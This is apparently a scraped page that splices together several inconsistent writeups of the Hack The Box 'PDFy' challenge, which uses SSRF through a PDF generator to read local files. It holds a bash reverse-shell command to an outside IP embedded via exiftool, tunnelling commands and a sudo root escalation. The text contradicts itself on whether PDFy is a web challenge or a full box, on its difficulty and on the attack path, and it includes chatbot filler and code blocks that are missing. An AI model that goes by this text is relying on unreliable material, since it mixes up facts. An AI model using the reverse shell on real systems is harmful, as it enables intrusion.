Pdfy Htb Writeup Upd [best]
PDFy is a retired Web challenge on Hack The Box that tests your ability to exploit Server-Side Request Forgery (SSRF) to read local files.
Here is a solid, step-by-step walkthrough to master this challenge. 🔍 Challenge Overview Name: PDFy Category: Web Difficulty: Easy
Core Vulnerability: Server-Side Request Forgery (SSRF) triggered via PDF generation. 1. Initial Reconnaissance
When you launch the target instance and navigate to the provided IP address, you will find a simple web application. The Functionality: The app prompts you to input a URL.
The Behavior: It takes that URL, visits it, and converts the webpage's contents into a downloadable PDF file.
The Goal: Leverage this behavior to trick the server into accessing its own internal files. 2. Identifying the Vulnerability
The application processes a remote resource (the URL you supply) and renders it. This is a textbook environment for SSRF.
If you input a standard website like http://google.com, the app grabs the page and makes a PDF.
If you try to directly input a local file path using the file protocol (e.g., file:///etc/passwd), the application will typically have a blacklist filter in place to block it. 3. Exploiting the SSRF (Bypassing the Filter)
To read local files, you need to bypass the URL input filter. The easiest way to achieve this is by using a Server-Side Redirect hosted on your own machine. Instead of giving the application a direct file path, you give it a URL pointing to a script you control.
Step A: Create a malicious PHP redirect scriptSave the following code as index.php on your local attacker machine: Use code with caution. Copied to clipboard
This script instructs anyone (or any bot) visiting it to immediately redirect to the local /etc/passwd file of the machine reading it.
Step B: Host the scriptStart a local PHP server on your machine on port 80: sudo php -S 0.0.0.0:80 Use code with caution. Copied to clipboard
Step C: Expose your server (If necessary)If you are playing on a cloud instance and the HTB box cannot route directly to your local IP, use a tool like Serveo to expose your local port 80 to the public internet: ssh -R 80:localhost:80 serveo.net Use code with caution. Copied to clipboard 4. Capturing the Flag 🚩
Copy the public URL provided by Serveo (or use your direct VPN IP if reachable). Paste this URL into the input field on the PDFy web app.
The app will visit your server, get hit with the Location: file:///etc/passwd header, and proceed to render the target machine's local /etc/passwd file into a PDF. pdfy htb writeup upd
Open or download the generated PDF. You will find the contents of the file, including the flag.
💡 Pro-Tip: If you ever struggle to find the exact flag location in similar challenges, keep it simple and start by looting files like /etc/passwd or application source code files to find hardcoded environment variables.
Official PDFy Discussion - Page 2 - Challenges - Hack The Box
If you intended a different machine name, feel free to clarify.
First Impressions – What Does “UPD” Mean?
The “UPD” tag is critical. Older versions of the PDFy writeup (from 2020–2021) often missed some nuanced vectors or used deprecated tools. The updated version reviewed here (likely late 2024 or early 2025) reflects:
- Changes in HTB’s network environment.
- Newer enumeration techniques (e.g., using
feroxbusterovergobuster, modernffufusage). - Clarified privilege escalation paths with actual exploit reasoning.
It’s clear the author revisited the machine to ensure relevance, which is a breath of fresh air compared to outdated walkthroughs that leave you stuck.
Privilege Escalation
The exploited user has limited privileges. However, it is possible to escalate privileges to root.
$ python -c 'import os; os.system("/bin/bash")'
pdfy@pdfy:/$ sudo -l
Matching Defaults entries for pdfy on pdfy:
env_reset, env_keep += "COLORFGBG KDEDIR", mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User pdfy may run the following commands on pdfy:
(ALL) NOPASSWD: ALL
The sudo privileges allow running any command as root without a password.
$ sudo bash
root@pdfy:/#
Conclusion
The Pdfy box on HTB is a medium-level difficulty box that requires exploitation of a vulnerable PDF upload service to gain access to the system. The system can be fully exploited to gain root access by leveraging command injection, a vulnerable PDF upload service, and weak sudo privileges.
Recommendations
- Validate and sanitize user-uploaded files to prevent command injection attacks.
- Implement proper access controls and limit privileges to prevent lateral movement.
- Regularly update and patch services to prevent exploitation of known vulnerabilities.
References
HTB: PDFy Machine Writeup (Updated) If you are prepping for the OSCP or just sharpening your web exploitation skills, PDFy on Hack The Box is a classic "easy" rated machine that provides a textbook example of Server-Side Request Forgery (SSRF).
While the box is straightforward, many beginners get stuck on the syntax or identifying the internal targets. This updated writeup covers the most efficient path to the user flag and explains the mechanics behind the exploit. 1. Enumeration: What are we working with? PDFy is a retired Web challenge on Hack
As always, we start with an Nmap scan to see which ports are open. nmap -sC -sV -oN nmap_report.txt Use code with caution. Results: Port 22 (SSH): Standard OpenSSH. Port 80 (HTTP): An Apache web server.
Navigating to the website, we find a simple web application that takes a URL and converts the webpage into a PDF document. This is a massive "low-hanging fruit" indicator for SSRF. Whenever an application fetches content from a remote URL you provide, you should immediately test if it can fetch internal resources. 2. Identifying the Vulnerability (SSRF)
The application asks for a URL. If we give it http://google.com, it generates a PDF of Google’s homepage. The real question is: Can it see itself?
If we try to point it to http://localhost or http://127.0.0.1, the application might have a "blacklist" filter that blocks these common keywords to prevent SSRF. To bypass this, we can use a redirect script on our own machine. The Bypass Plan: Host a PHP file on your local attacker machine.
The file will redirect any incoming request to a local file on the HTB server (like /etc/passwd). Give the PDFy app the URL of your hosted script. 3. Exploitation: Reading Local Files Create a file named exploit.php on your machine: Use code with caution. Start a local PHP server: php -S 0.0.0.0:8000 Use code with caution.
Now, go back to the PDFy web interface and enter your IP:http://
What happens?The PDFy server visits your script. Your script tells the server, "Actually, go look at file:///etc/passwd." Because the PDF generator follows redirects, it grabs the local system file and renders it into the PDF.
Download the generated PDF, and you will see the contents of the /etc/passwd file. Looking through the users, you should notice a user named 234-pwn. 4. Pivoting to the User Flag
Now that we know we can read files, we need to find something sensitive. A common target is the Nginx or Apache configuration files to see if there are any hidden internal ports or applications running.
By digging through standard locations (or using the SSRF to scan ports), we find that there is an internal API or service running on a non-standard port (often port 15000 on this specific box). Change your exploit.php to: Use code with caution.
Submit the URL again. The resulting PDF reveals a web interface for a small application. Browsing through the internal site's files via the same redirect method, you can eventually locate the user credentials or the flag itself located in the user's home directory. 5. Summary & Key Takeaways
The PDFy box highlights why developers must sanitize URL inputs.
Vulnerability: Insecure PDF generation from user-supplied URLs. Attack Vector: SSRF via a 302 Redirect bypass.
Mitigation: Use a whitelist of allowed domains, disable "follow redirects" in the PDF engine, and ensure the service runs with low-level permissions that cannot access the file:// scheme.
Pro Tip: If file:///etc/passwd doesn't work directly due to a filter, always try the redirect method or decimal/hex encoding of the IP address! First Impressions – What Does “UPD” Mean
For a writeup of the PDFy challenge on Hack The Box (HTB), the primary vulnerability lies in an SSRF (Server-Side Request Forgery) found in the PDF generation process. The application uses the wkhtmltopdf tool, which can be manipulated to interact with internal resources. Challenge Overview
Target: A web application that converts provided URLs into PDF documents. Vulnerability: Insecure URL handling during PDF generation.
Goal: Read local files (like /etc/passwd) using the server's internal access. Step-by-Step Walkthrough Reconnaissance & Identification The web interface accepts a URL to convert to PDF. The backend often uses wkhtmltopdf to render the content.
Traditional injections (like HTML tags) might not directly validate, but the server must query the provided URL to render it. Foothold: Local File Inclusion (LFI) via SSRF
Since the server fetches and renders the URL, you can use the file:// protocol to point it toward internal system files.
Payload Example: Instead of a web URL, provide file:///etc/passwd to see if the server renders the system's password file into the resulting PDF.
Tip: If the direct file:// protocol is blocked or fails, you can host a simple redirect script on your own server (using Serveo to expose it) that redirects the HTB bot to the local file. Exploitation & Data Exfiltration
Once you successfully render /etc/passwd, you have confirmed the LFI/SSRF vulnerability.
Use this access to hunt for the flag, typically located in a standard user directory or within the web application's configuration files. Key Takeaways for Success
Avoid Redirectors with Warnings: Services like ngrok often include browser warnings that can break the automated PDF rendering process. Use cleaner alternatives like Serveo or your own VPS.
Local Testing: If the remote target is behaving unexpectedly, try running wkhtmltopdf locally with various inputs to understand how it handles redirects and local file protocols.
Stay Simple: Many users struggle by overcomplicating the attack with complex reverse proxies. The most straightforward path is often a basic redirect to a file:// URI.
Official PDFy Discussion - Page 2 - Challenges - Hack The Box
Reverse Shell
Crafted PDF with title:
exiftool -Title='test; bash -c "bash -i >& /dev/tcp/10.10.14.xx/4444 0>&1";' shell.pdf
Upload → reverse shell as www-data.
Potential Drawbacks
- Not beginner-friendly – If you haven’t completed at least 5–10 easy HTB machines, some steps (like URL encoding the payload or setting up a listener with
rlwrap) will feel rushed. - Missing alternative paths – PDFy has at least two ways to get user (one via PDF injection, another via a forgotten API endpoint). The writeup only covers the main path. A short “alternative approach” section would enrich it.
- Outdated links – Some referenced GitHub gists for the exploit code are dead (though the author provides inline code, so it’s not crippling).